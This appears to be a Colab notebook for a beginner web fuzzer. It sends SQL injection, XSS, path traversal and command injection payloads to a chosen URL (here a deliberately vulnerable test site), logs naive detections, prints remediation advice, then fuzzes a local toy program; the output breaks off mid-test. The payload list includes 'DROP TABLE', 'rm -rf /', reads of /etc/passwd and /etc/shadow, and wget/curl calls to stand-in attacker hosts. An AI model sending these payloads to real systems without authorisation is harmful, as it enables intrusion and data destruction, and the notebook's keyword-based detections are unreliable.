<a href="https://colab.research.google.com/github/Mirinmano/web_Fuzzing/blob/master/fuzzing.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
!pip install requests beautifulsoup4


In [18]:
import requests
import random
import string
import logging
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
from bs4 import BeautifulSoup
from google.colab import files

TARGET_URL = input("Enter the URL of the site to test: ")

FORM_DATA = {
    "username": "admin",
    "password": "password123"
}

f = open("fuzzer_log.log", "w")

vulnerability = []
HEADERS = {
    "User-Agent": "Mozilla/5.0",
    "Referer": TARGET_URL,
    "X-Forwarded-For": "127.0.0.1"
}

PAYLOADS = [
    "'", "\"", "' OR 1=1 --", "\" OR 1=1 --", "' OR 'a'='a", "\" OR \"a\"=\"a", "' OR '1'='1' --",
    "' UNION SELECT NULL, NULL, NULL --", "' UNION SELECT username, password FROM users --",
    "'; DROP TABLE users; --", "' OR '1'='1' /*", "\" OR \"1\"=\"1\" /*",

    "<script>alert('XSS')</script>", "<img src='x' onerror='alert(1)'>",
    "<svg onload=alert(1)>", "<body onload=alert(1)>", "<iframe src='javascript:alert(1)'></iframe>",
    "<input onfocus=alert(1)>", "<a href=javascript:alert(1)>Click me</a>",
    "<marquee onstart=alert(1)>XSS</marquee>", "javascript:alert(1)",

    "../../../etc/passwd","/etc/passwd", "../../../../../etc/passwd", "../../../../../../windows/system32/cmd.exe",
    "/etc/passwd", "/windows/system32/cmd.exe", "../../../../../../boot.ini",

    "; rm -rf /", "&& ls", "| cat /etc/passwd", "|| ls", "; wget http://malicious-site.com",
    "`whoami`", "|| netstat -an", "`curl http://malicious-site.com`",

    "/../../../../etc/passwd", "/../../../../windows/system32/drivers/etc/hosts",
    "../../../../../../../../etc/shadow", "../../../../../../../../windows/win.ini",

    "http://malicious-site.com/shell.txt", "https://attacker.com/exploit.php",

    ''.join(random.choices(string.ascii_letters + string.digits, k=5)),
    ''.join(random.choices(string.ascii_letters + string.digits, k=5)),
    ''.join(random.choices(string.ascii_letters + string.digits, k=2))
]

def provide_recommendations(vulnerability_type):
    recommendations = {
        "XSS": [
            "Sanitize user inputs by escaping special characters like <, >, and &.",
            "Use security libraries such as OWASP Java Encoder or Python's html.escape.",
            "Implement Content Security Policy (CSP) to restrict the execution of scripts."
        ],
        "SQL Injection": [
            "Use parameterized queries or prepared statements to safely handle user inputs.",
            "Validate and sanitize user inputs before executing SQL queries.",
            "Avoid dynamic SQL queries and limit the database user privileges."
        ],
        "Path Traversal": [
            "Restrict file paths to only allow specific directories.",
            "Sanitize file input and check for path traversal characters like ../",
            "Use built-in functions to validate file paths."
        ],
        "Command Injection": [
            "Avoid executing system commands with unsanitized user inputs.",
            "Use libraries or functions designed to safely interact with the operating system (e.g., subprocess with safe options).",
            "Escape special characters in shell commands or avoid using them altogether."
        ],
        "LFI": [
            "Sanitize and validate file paths before including them.",
            "Use strict input validation to prevent directory traversal.",
            "Ensure files are fetched from safe, predefined directories."
        ],
        "RFI": [
            "Disable the ability to include remote files in your application.",
            "Sanitize and validate URLs provided by users.",
            "Configure your server to restrict access to remote files."
        ]
    }
    return recommendations.get(vulnerability_type, ["No recommendations available for this vulnerability."])

def fuzz_form_fields():
    for payload in PAYLOADS:
        form_data = FORM_DATA.copy()

        for key in form_data:
            original_value = form_data[key]
            mutated_value = original_value + payload
            form_data[key] = mutated_value

        try:
            response = requests.post(TARGET_URL, data=form_data)
            logging.info(f"Form Payload: {payload}, Response Status: {response.status_code}")
            f.write(f"Form Payload: {payload}, Response Status: {response.status_code}")
            check_for_vulnerabilities(response.text, payload)

        except requests.exceptions.RequestException as e:
            logging.error(f"Error with form payload: {payload}, Exception: {str(e)}")
            f.write(f"Error with form payload: {payload}, Exception: {str(e)}")

def fuzz_url_parameters():
    parsed_url = urlparse(TARGET_URL)
    query_params = parse_qs(parsed_url.query)

    for payload in PAYLOADS:
        mutated_params = {k: v + [payload] for k, v in query_params.items()}
        encoded_params = urlencode(mutated_params, doseq=True)
        fuzzed_url = urlunparse(parsed_url._replace(query=encoded_params))

        try:
            response = requests.get(fuzzed_url)
            logging.info(f"URL Payload: {payload}, Response Status: {response.status_code}")
            f.write(f"URL Payload: {payload}, Response Status: {response.status_code}\n")
            check_for_vulnerabilities(response.text, payload)

        except requests.exceptions.RequestException as e:
            logging.error(f"Error with URL payload: {payload}, Exception: {str(e)}\n")
            f.write(f"Error with URL payload: {payload}, Exception: {str(e)}")

def fuzz_headers():
    for payload in PAYLOADS:
        headers = HEADERS.copy()

        for key in headers:
            headers[key] = headers[key] + payload

        try:
            response = requests.get(TARGET_URL, headers=headers)
            logging.info(f"Header Payload: {payload}, Response Status: {response.status_code}")
            f.write(f"Header Payload: {payload}, Response Status: {response.status_code}\n")
            check_for_vulnerabilities(response.text, payload)

        except requests.exceptions.RequestException as e:
            f.write(logging.error(f"Error with header payload: {payload}, Exception: {str(e)}\n"))

def check_for_vulnerabilities(response_text, payload):
    if any(error in response_text.lower() for error in [ 'xss', 'script']):
        logging.error(f"XSS detected with payload: {payload}")
        f.write(f"XSS detected with payload: {payload}")
        if "XSS" not in vulnerability:
          vulnerability.append("XSS")

    if any(error in response_text.lower() for error in ['syntax error', 'sql', 'unexpected']):
        logging.error(f"SQL Injection detected with payload: {payload}")
        f.write(f"SQL Injection detected with payload: {payload}\n")
        if ("SQL Injection" not in vulnerability):
          vulnerability.append("SQL Injection")

    if any(error in response_text.lower() for error in ["../../../etc/passwd", "../../../../../etc/passwd", "../../../../../../windows/system32/cmd.exe",
    "/etc/passwd", "/windows/system32/cmd.exe", "../../../../../../boot.ini"]):
        logging.error(f"Path Traversal detected with payload: {payload}")
        f.write(f"Path Traversal detected with payload: {payload}\n")
        if ("Path Traversal" not in vulnerability):
          vulnerability.append("Path Traversal")

    if any(error in response_text.lower() for error in ["; rm -rf /", "&& ls", "| cat /etc/passwd", "|| ls", "; wget http://malicious-site.com",
    "`whoami`", "|| netstat -an", "`curl http://malicious-site.com`"]):
        logging.error(f"Command Injection detected with payload: {payload}")
        f.write(f"Command Injection detected with payload: {payload}\n")
        if ("Command Injection" not in vulnerability):
          vulnerability.append("Command Injection")

def recomendation():
  for vuln in vulnerability:
    if vuln == "XSS":
      print("\nRecommendation for XSS Prevention:")
      for recommendation in provide_recommendations("XSS"):
          print(f"- {recommendation}")
    if vuln == "SQL Injection":
      print("\nRecommendation for SQL Injection Prevention:")
      for recommendation in provide_recommendations("SQL Injection"):
          print(f"- {recommendation}")
    if vuln == "Path Traversal":
      print("\nRecommendation for Path Traversal Prevention:")
      for recommendation in provide_recommendations("Path Traversal"):
          print(f"- {recommendation}")
    if vuln == "Command Injection":
      print("\nRecommendation for Command Injection Prevention:")
      for recommendation in provide_recommendations("Command Injection"):
          print(f"- {recommendation}")
def main():

    print("Starting Web Vulnerability Fuzzing...")

    fuzz_form_fields()
    fuzz_url_parameters()
    fuzz_headers()
    recomendation()

    print("Fuzzing Completed.")

if __name__ == "__main__":
    main()
    f.close()


Enter the URL of the site to test: http://testphp.vulnweb.com/
Starting Web Vulnerability Fuzzing...


ERROR:root:XSS detected with payload: '
ERROR:root:SQL Injection detected with payload: '
ERROR:root:XSS detected with payload: "
ERROR:root:SQL Injection detected with payload: "
ERROR:root:XSS detected with payload: ' OR 1=1 --
ERROR:root:SQL Injection detected with payload: ' OR 1=1 --
ERROR:root:XSS detected with payload: " OR 1=1 --
ERROR:root:SQL Injection detected with payload: " OR 1=1 --
ERROR:root:XSS detected with payload: ' OR 'a'='a
ERROR:root:SQL Injection detected with payload: ' OR 'a'='a
ERROR:root:XSS detected with payload: " OR "a"="a
ERROR:root:SQL Injection detected with payload: " OR "a"="a
ERROR:root:XSS detected with payload: ' OR '1'='1' --
ERROR:root:SQL Injection detected with payload: ' OR '1'='1' --
ERROR:root:XSS detected with payload: ' UNION SELECT NULL, NULL, NULL --
ERROR:root:SQL Injection detected with payload: ' UNION SELECT NULL, NULL, NULL --
ERROR:root:XSS detected with payload: ' UNION SELECT username, password FROM users --
ERROR:root:SQL Injec


Recommendation for XSS Prevention:
- Sanitize user inputs by escaping special characters like <, >, and &.
- Use security libraries such as OWASP Java Encoder or Python's html.escape.
- Implement Content Security Policy (CSP) to restrict the execution of scripts.

Recommendation for SQL Injection Prevention:
- Use parameterized queries or prepared statements to safely handle user inputs.
- Validate and sanitize user inputs before executing SQL queries.
- Avoid dynamic SQL queries and limit the database user privileges.
Fuzzing Completed.


In [20]:
import random
import string
import subprocess
import os

def generate_random_input(length=20, special_cases=None):
    """Generate a random string, sometimes inserting special cases like 'usefree' or 'confuse'."""
    if special_cases and random.random() > 0.7:
        input_str = random.choice(special_cases)
    else:
        input_str = ''.join(random.choices(string.ascii_letters + string.digits + string.punctuation, k=length))
    return input_str

def fuzz_executable(exec_path, num_tests=100):
    """Fuzz the given executable with random inputs."""
    special_cases = ["usefree", "confuse", "1234567890" * 10]
    for i in range(num_tests):
        fuzz_input = generate_random_input(random.randint(5, 150), special_cases)

        try:
            result = subprocess.run(['python3', exec_path, fuzz_input], capture_output=True, text=True, timeout=3)
            print(f"Test #{i+1} with input: {fuzz_input}")
            print("Return code:", result.returncode)
            print("Output:", result.stdout)
            print("Error (if any):", result.stderr)
            print("-" * 50)

            if result.returncode != 0:
                print(f"Program crashed with input: {fuzz_input}")
                break

        except subprocess.TimeoutExpired:
            print(f"Test #{i+1} timed out with input: {fuzz_input}")
        except Exception as e:
            print(f"Test #{i+1} failed with exception: {e}")

exec_path = "/content/vulnerable_program.py"

fuzz_executable(exec_path, num_tests=100)


Test #1 with input: Mq9MP$aH5(H#$288,{g
Return code: 0
Output: Execution completed without major issues.

Error (if any): 
--------------------------------------------------
Test #2 with input: S`.nxadoU^lN21u0lG#=w[Tst,04TjfY)]>T]c9"f)6/sEm+;Mt=4(.Wa{y,bo+C2Pl!-ut&Iaw7g6!oIS;{y*;j|WcTi)ia@6rIzXoZq{f&fB:r_M#<SIeNT;va3qb/do$;0FZ)
Return code: 0
Output: Simulated memory corruption! Data size too large!
Exception occurred: Memory corruption detected!

Error (if any): 
--------------------------------------------------
Test #3 with input: zgqV{N.PE}av2n%.T8b9iUhTfl<5:5+*c0qP_{IS`U6i56bwvdoON2w?]0dT)K+>=W8i@i,?8BKCmv`%U/xWB`=U#f}b&E(6E!lSQ7jJR5?w-ivw/cJ=NCe\EH\uh`;#X{WHN$
Return code: 0
Output: Simulated memory corruption! Data size too large!
Exception occurred: Memory corruption detected!

Error (if any): 
--------------------------------------------------
Test #4 with input: #Q%"x0}B7t1EcCBQ2[EeU1K/Oa5/^wml8Y9(14f\-):8.[=sG72n0ALo,=P"VYa)Mg/HsNY&/M9"]2fY;!lL5w[Ruclp/GWQ$GuD<uG&gOqii$}**v